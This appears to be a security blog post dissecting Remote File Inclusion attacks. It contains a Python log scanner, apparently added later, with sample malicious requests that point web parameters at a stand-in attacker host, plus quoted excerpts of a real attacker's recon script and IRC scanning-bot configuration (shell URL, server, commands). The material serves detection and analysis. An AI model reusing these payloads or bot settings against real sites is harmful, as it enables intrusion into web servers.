Remote File Inclusion Attacks – pt1

One of the constant threats out on the internet is the Remote File Inclusion (RFI) attack. This class of threat is simple to execute and can yield very valuable results to the attacker, and with the multitude of web applications out there, new vulnerabilities are constantly being discovered. The subject is rather large, so I will have to make this a series of posts covering the tools, tactics and infrastructure used in these attacks.

For those needing more information on what RFI attacks are and how they work, please see the Wikipedia article on Remote File Inclusion.

To start off, RFI attacks are easy to find. If you have a website, chances are an automated attack has already paid it a visit. Here are a few things to check for when looking through web access logs:

  • File names beginning with “id”
  • Files with a .txt extension (exclude robots.txt and this list will be very small)
  • 404 errors
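To show what those three checks look like when applied to real access logs, here is a small log scanner I have added for this post (it is not code from the original article or from any of the attacker tools discussed). It parses lines in the common Apache/nginx "combined" format, flags the three indicators listed above, and adds a fourth that a defender generally wants as well: a query parameter whose value is itself a remote URL, which is the basic shape of an RFI request. The log lines embedded in it are constructed samples using reserved documentation addresses; the file names, parameter names and IPs in them are assumptions, not values from the post.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (Apache/nginx "combined" format).
# Hosts, paths and parameter names are made up for illustration.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Apr/2008:03:14:07 +0000] "GET /index.php?page=http://198.51.100.9/~evil/id1.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [12/Apr/2008:03:14:09 +0000] "GET /wp-content/plugins/foo/view.php?inc=http://198.51.100.9/bot.txt?? HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
198.51.100.22 - - [12/Apr/2008:03:15:00 +0000] "GET /robots.txt HTTP/1.1" 200 68 "-" "Googlebot/2.1"
192.0.2.5 - - [12/Apr/2008:03:16:30 +0000] "GET /about.php HTTP/1.1" 200 2048 "http://example.org/" "Mozilla/5.0"
192.0.2.5 - - [12/Apr/2008:03:16:31 +0000] "GET /missing/page HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, request line and status code from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def extract_filenames(target):
    """Return (basenames, remote_urls) for a request target.

    basenames holds the last path segment of the request itself plus the last
    path segment of every query-parameter value that is a remote URL, since the
    attacker's file name (e.g. id1.txt) lives inside that parameter, not in the
    local path.
    """
    parts = urlsplit(target)
    names = [parts.path.rsplit("/", 1)[-1]]
    remote_urls = []
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        if value.lower().startswith(REMOTE_SCHEMES):
            remote_urls.append(value)
            names.append(urlsplit(value).path.rsplit("/", 1)[-1])
    return names, remote_urls


def classify(line):
    """Parse one log line and return a dict with the indicator flags it trips,
    or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    names, remote_urls = extract_filenames(m["target"])
    flags = set()
    for name in names:
        low = name.lower()
        if low.startswith("id"):                      # check 1: file names beginning with "id"
            flags.add("id_file")
        if low.endswith(".txt") and low != "robots.txt":  # check 2: .txt files, robots.txt excluded
            flags.add("txt_file")
    if m["status"] == "404":                          # check 3: 404 errors
        flags.add("status_404")
    if remote_urls:                                   # extra: remote URL passed as a parameter
        flags.add("remote_url_param")
    return {"ip": m["ip"], "target": m["target"], "status": m["status"], "flags": flags}


def scan_log(text):
    """Return the entries that trip at least one indicator, in log order."""
    hits = []
    for line in text.splitlines():
        entry = classify(line)
        if entry and entry["flags"]:
            hits.append(entry)
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ip"]:15} {hit["status"]} {sorted(hit["flags"])}  {hit["target"]}')
```

On the sample above, the two requests carrying a remote URL are flagged on several indicators at once, the plain 404 on its own, and the robots.txt and normal page requests not at all; on a production log the 404 check by itself is noisy, so it is the overlap of flags (and repeated hits from one client in a short window) that deserves attention.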

The steps involved in most RFI attacks are as follows:

  1. Attackers scan the internet via a bot that queries several search engines to find vulnerable web applications.
  2. Once a vulnerable site is found, it is marked with an ID tag of sorts.
  3. The scanner then tracks these ID tags and uploads a second script to gather basic information on the machine.
  4. The attacker then uploads a PHP shell which gives them control over the device.
  5. More tools are uploaded, such as other PHP IRC bots.

To get a little inspiration I headed over to honeynet.cz and looked through some recent RFI attacks they received. To truly understand an attack, it is best to obtain the attacker’s code. After a few minutes of searching, I found an RFI attack site whose directory was unsecured (note that this is all publicly obtainable information).

Honeynet.cz RFI attacker: hxxp://70.38.120.161/~anyhost/wp-content/uploads/chid

The chid file is a text file which is used as step 3 from the list above. Here are some of its contents:

echo "rzor was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";

Attacker files

bot.txt is fairly self-explanatory: this is an RFI scanning bot which contains everything you need to know, including:

  • IRC server / channel the bot connects to
  • Administrative credentials to disable the bot
  • Commands accepted
  • Attacker information
  • Related URLs

Here is some of the pertinent information:

my $id = "hxxp://70.38.120.161/~anyhost/wp-content/uploads/chid?"; #Your RFI Response
my $shell = "hxxp://skoolage.angelfire.com/other.txt?"; #Shell printed on the Vulnerable Site
my $ircd = "irc.ccpower.org"; #Irc-Server
my $port = "6667"; #Irc-Server Port
my $chan1 = "#rfi"; #Chan for Scan
my $chan2 = "#rfi"; #Results will be printed here too
my $nick = "[Lock]|ON|[stratos][".int(rand(1000))."]"; #Nick
my @admins = ("rzor");
my $killpwd = "XXXXX"; #Password to Kill the Bot
my $chidpwd = "XXXXX"; #Password to change the RFI Response

[+] Coded by rzor
[+] Contact: rzor[at]Gmail[dot]Com
[+] Keep it private !
[+] *New release, more fun ;)
[+] *Updated to: 4/11/2008

!rfi <bug> <dork> -p <sites/proc> > Start the RFI Scanner
!lfi <bug> <dork> > Start the LFI Scanner
!sql <bug> <dork> -p <sites/proc> > Start the SQL Injection Scanner
!rce <bug> <dork> -p <sites/proc> > Start the RCE Scanner

This bot (Scanner V6) was originally written by 0sirys; each attacker usually re-brands it with their own nickname and email. You can find websites compromised with Osirys's bot by googling for "Osirys was here".

The directory contains another RFI scanning bot (rfiscan.txt) and some other curious tools in the /rapi and /tr directories. The /rapi/ directory contains a script to check whether a given rapidshare account is valid. I don't know the specific reason for checking this, but if anyone does know, please leave a comment. The /tr/ directory contains a script (written in Spanish) to harvest email accounts by searching various search engines.
Harvester

As you can see, RFI attacks can be quite deadly but can be easy to dissect. The series will continue in the next few days with more RFI attacks. Copies of these files are available to members of the security community; please drop me a line if you are interested.

1 comment to Remote File Inclusion Attacks – pt1

  • Jaun Millalonco

    My first visit here, found the blog accidentally really, and I just wanted to say I’ve enjoyed my visit and had some good reads while here :)
    Juan
